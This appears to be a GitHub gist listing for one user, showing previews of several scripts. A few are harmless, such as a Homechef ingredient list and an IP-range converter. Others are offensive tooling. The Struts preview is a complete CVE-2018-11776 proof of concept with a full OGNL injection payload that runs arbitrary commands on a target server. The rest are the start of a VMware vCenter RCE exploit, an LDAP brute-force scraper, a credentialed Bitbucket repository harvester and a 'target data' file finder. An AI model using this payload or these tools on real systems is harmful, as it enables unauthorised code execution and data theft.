atucom
/ gist:9c4886f65185944816110990bba9f0a5
Created
July 5, 2017 19:15
Top Ingredients for Homechef
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The following are the top 100 ingredients as scraped from Homechef's website: | |
| 178 Garlic Cloves | |
| 154 Butter | |
| 115 Shallot | |
| 106 Boneless Skinless Chicken Breasts | |
| 99 Green Onions | |
| 88 Grape Tomatoes | |
| 73 Lemon | |
| 70 Liquid Egg | |
| 65 Red Onion |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Written by @Atucom | |
| # This exploits the Vmware Vcenter Remote code execution vulnerability | |
| import argparse | |
| import sys | |
| import logging | |
| import requests | |
| try: |
atucom
/ ipconvert.py
Created
March 19, 2018 15:16
converts 1.1.1.1-1.1.1.4 notation into individual IPs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| #pip3 install iptools | |
| #converts 1.1.1.1-1.1.1.4 notation into individual IPs | |
| #@atucom | |
| import iptools | |
| with open('ips.txt') as f: | |
| lines = f.readlines() | |
| for line in lines: | |
| if '-' in line: | |
| iprange = line.split('-') |
atucom
/ gist:1a3b5850c8a63ab74f3d72d8861d80c8
Created
March 19, 2018 20:03
Chop off subdomains from an FQDN
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| #pip3 install tldextract | |
| #Hostnames listed one/line in supplied file | |
| #@atucom | |
| with open('ips.txt.ssl_and_dns.hostnames') as f: | |
| hostnames = f.readlines() | |
| for hostname in hostanmes: | |
| domain = tldextract.extract(hostname) | |
| print(domain.registered_domain) |
atucom
/ loldongs.py
Created
July 18, 2018 23:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ LOLDONGS Encoding | |
| This converts data into a series of ASCII dicks. | |
| Because with great power, comes great responsibility. | |
| """ | |
| import argparse | |
| import sys | |
| def encode(inputData): |
atucom
/ outlier.py
Last active
October 29, 2018 23:18
This returns the files in the current directory that are statistical outliers in terms of file size
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| @atucom | |
| This returns the files in the target directory that are | |
| statistical outliers in terms of file size | |
| This is useful in the quest for finding target data. | |
| """ | |
| from __future__ import division | |
| import argparse | |
| import sys |
atucom
/ parsehtml.py
Created
August 2, 2018 22:42
Parse HTML for ingredient list, customized for homechef
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lxml import html | |
| import lxml | |
| import os | |
| from collections import defaultdict | |
| def getIngredients(htmlFile): | |
| # Returns the ingredients from an html file | |
| try: | |
| tree = html.fromstring(htmlFile) | |
| except lxml.etree.ParserError: |
atucom
/ CVE-2018-11776-PoC.py
Last active
July 16, 2019 01:46
Simple PoC for the Apache Struts vuln CVE-2018-11776
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| # Simple PoC for the Apache Struts vuln CVE-2018-11776 | |
| # this currently works on the struts showcase app but can easily be adapted to anything | |
| # Thanks to https://github.com/jas502n/St2-057 for working OGNL statements :D (proper URL encoding REALLY matters) | |
| # @atucom | |
| def runCMD(command): | |
| target = 'http://192.168.235.181:8080/struts3-showcase/' | |
| payload = '%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27' + command + '%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action' | |
| return requests.get(target + payload).text |
atucom
/ ldapscraper.py
Created
August 30, 2018 02:27
Brute force LDAP CN entries and download them locally
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # @atucom 2018 | |
| # This tool brutes all cn attributes from ldap recursively. | |
| # Additionally, if a result limit is exceeded, it will drill down farther and keep going | |
| import os | |
| import subprocess | |
| import string |
atucom
/ gitRepoDownloader.py
Created
August 30, 2018 16:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # @atucom 2018 | |
| # This script, given credentials and a host, will clone all the git repos | |
| # from a bitbucket server into appropriately named project folders locally. | |
| # Just update the username, password, and host, and let it go. | |
| import stashy | |
| import os | |
| import subprocess |